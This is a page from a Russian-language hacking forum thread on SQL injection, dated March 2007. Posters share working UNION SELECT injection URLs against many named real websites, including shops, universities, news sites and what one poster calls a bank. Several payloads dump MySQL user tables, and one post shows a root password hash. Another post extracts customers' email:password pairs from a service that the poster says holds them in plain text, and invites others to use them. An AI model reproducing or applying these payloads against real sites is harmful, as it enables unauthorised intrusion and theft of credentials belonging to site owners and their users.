SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 46 of 798
  1. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Spyder, Китай любит тебя :D

    Code:
    http://www.hongkongnavi.com/shop/shop.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105+from+mysql.user/*
     
    #901 n0ne, 11 Mar 2007
    1 person likes this.
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    в добавление:
    Code:
    http://azur.ru/gelendzhik/db.php?owner=282+and+282=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x0),0x0),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+mysql.user/*
    root:*AB3D38951ECD62929CF96E60B677D0A5B1C08FCB

    ps: +toxa+ молодец, исправил :) я тока написать хотел)
     
    #902 n1†R0x, 11 Mar 2007
    1 person likes this.
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.boyersteel.com/products.php?id=-4+union+select+1,convert(version()+using+latin1),3,4/*
     
    #903 BlackCats, 11 Mar 2007
    1 person likes this.
  4. ClonoX

    ClonoX New Member

    Joined:
    23 Dec 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    _http://kagul.ru/photooboy/index.php?action=detail&id=
    самоя простя скула..


    +видео по взлому сайта!
    _http://rapidshare.com/files/20587714/bezpredel.rar.html я прсто ржал когда ломал его!!!
     
    #904 ClonoX, 12 Mar 2007
    Last edited: 12 Mar 2007
  5. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    лол ты где увидел там sql инъекцию ? :eek:
     
    #905 }{0TT@БЬ)Ч, 12 Mar 2007
  6. ClonoX

    ClonoX New Member

    Joined:
    23 Dec 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    .. если ты про видео.. его там нет! просто прикольнуло... решыл с другими поделится... люблю я разработчиков таких сайтов! :D

    +
    http://www.es-loule.edu.pt/index.php?op=d2&grupo='PO'%20union+select/**/0,2,3,4,5,6,7,8,9/*
     
    #906 ClonoX, 12 Mar 2007
  7. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Code:
    http://www.fondsk.ru/article.php?id=-1+union+select+1,2,3,4,5,USER(),VERSION(),8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
     
    #907 VampiRUS, 12 Mar 2007
    3 people like this.
  8. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    Code:
    http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*
    Первая скуль, поэтому на правах нуба задам вопросик:
    вот выше я подобрал количество, но когда я делаю такой запрос:
    Code:
    http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*
    получаю пинка
    Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

    Учебник по MySQL только начал курить)
     
    #908 Horsekiller, 12 Mar 2007
  9. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Просто нужно использовать конвертирование в нужную тебе кодировку... Как ты наверно заметил тебе нужна cp1251:
    Code:
    http://www.yuretz.ru/prikol.php?id=-1+union+select+1,convert(user()+using+cp1251),333,4,5,6,7,888,9,1,2,3/*
     
    #909 ice1k, 12 Mar 2007
    1 person likes this.
  10. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Я уже выкладывал

    Code:
    http://www.xmlhack.com/read.php?item=-1+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,0,1+from+information_schema.tables/*
     
    #910 VampiRUS, 12 Mar 2007
    Last edited: 12 Mar 2007
  11. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Я так понял, тут звонки по Америке нахаляву :) правда х3 каким образом, но все же :)
    http://www.i711.com/about.php
    сама инъекция:
    Code:
    http://www.i711.com/my711.php?tab=2&article=-1+union+select+1,2,concat(email,0x3a,passwd),4,5,6,7,8,9+from+users+limit+20623,1/*
    20624 юзера, мыла:пароли в чистом виде.
    пользуйтесь :p
     
    #911 n1†R0x, 12 Mar 2007
    2 people like this.
  12. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Сайт банка)
     
    #912 Colkru, 12 Mar 2007
    1 person likes this.
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ----
     
    #913 Spyder, 12 Mar 2007
  14. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Какойто интернет магазин.

    ___
    Code:
    http://www.linspire.com/linspire_letter_archives.php?id=-1+union+select+1,version(),3,4/*
    ___
    Code:
    http://www.urallink.ru/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
     
    #914 Colkru, 12 Mar 2007
    Last edited: 12 Mar 2007
  15. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

http://www.newssamara.ru/showNews.php?id=-1+union+select+111,222,333,444,555,version(),777,888,999,1010,1111,1212,1313,1414,1515/*
     
    #915 -=lebed=-, 12 Mar 2007
    Last edited: 12 Mar 2007
    3 people like this.
  16. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.careysookocheff.com/index.php?id=-1+union+select+1,version(),3/*
     
    #916 Colkru, 12 Mar 2007
    1 person likes this.
  17. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.slavneft.ru/press/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
     
    #917 ice1k, 12 Mar 2007
    2 people like this.
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    http://www.cecs.uwaterloo.ca/students/sessions_details.php?id=-666+union+select+1,2,3,4,version(),6,7,8,9,10,user(),12/*

http://ostro.org/shownews_tema.php?id=-223+union+select+1,2,version(),user(),5/*


http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-33+union+select+1,2,3,version(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
     
    #918 -=lebed=-, 12 Mar 2007
    Last edited: 12 Mar 2007
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    сайт на арабском =) там всё справа налево
    update\/
    http://loserzcomic.com/index.php?id=-8+union+select+1,2,3,4,version(),6,7,8/*
    http://www.boyersteel.com/products.php?id=-4+union+select+1,convert(version()+using+latin1),3,4/*
    http://www.worstpreviews.com/review.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40
    http://www.reusablebags.com/facts.php?id=-7+union+select+1,2,3,4,5,6,7/*
    http://tellertest.com/tellers.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,72,71,73,74,75,76,77,78/*
    http://www.bathtubmusic.com/genre.php?id=-2+union+select+1,version()
    http://www.horoskopa.com/signs.php?id=-2+union+select+1,convert(version()+using+cp1251)
    http://bulgaria-vidin.com/estate-new-window.php?es=-10+union+select+1,convert(version()+using+latin1),3,4,5,6,7,8,9,10
     
    #919 Spyder, 12 Mar 2007
    Last edited: 12 Mar 2007
    3 people like this.
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    http://www.gridcc.org/getfile.php?id=-200+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
    #920 -=lebed=-, 12 Mar 2007
    1 person likes this.
(You must log in or sign up to post here.)
Page 46 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.